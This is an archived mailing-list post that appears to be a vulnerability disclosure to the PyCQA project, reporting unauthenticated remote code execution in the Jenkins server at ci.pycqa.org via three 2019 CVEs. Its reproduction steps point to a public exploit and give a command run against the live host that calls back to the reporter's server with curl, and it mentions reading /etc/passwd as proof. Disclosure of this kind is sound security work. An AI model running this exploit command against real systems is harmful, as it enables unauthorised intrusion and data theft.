[code-quality] [Security] Jenkins Unauthenticated RCE on https://ci.pycqa.org/

[Ái. Hồ Quốc]

Dear Sir/Madam,

While Searching Jenkins Dashboard I discovered that this domain (https://ci.pycqa.org/) vulnerable to this CVEs (CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029) allow attacker can execute arbitrary command commands on a target operating system.

Steps To Reproduce:
Download the exploit (https://github.com/orangetw/awesome-jenkins-rce-2019) and issue the command below:

python2.7 exp.py https://ci.pycqa.org/ "curl myserver.ip/oob/"

Then I check my server to verify that command executed.(see attached images for POC about content of /etc/passwd file )


Best regards,
-j3ssie-
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190516/ce8abddc/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screen Shot 2019-05-15 at 16.59.44.png
Type: image/png
Size: 33937 bytes
Desc: Screen Shot 2019-05-15 at 16.59.44.png
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190516/ce8abddc/attachment-0003.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screen Shot 2019-05-15 at 16.59.06.png
Type: image/png
Size: 311066 bytes
Desc: Screen Shot 2019-05-15 at 16.59.06.png
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190516/ce8abddc/attachment-0004.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screen Shot 2019-05-15 at 16.58.20.png
Type: image/png
Size: 30418 bytes
Desc: Screen Shot 2019-05-15 at 16.58.20.png
URL: <http://mail.python.org/pipermail/code-quality/attachments/20190516/ce8abddc/attachment-0005.png>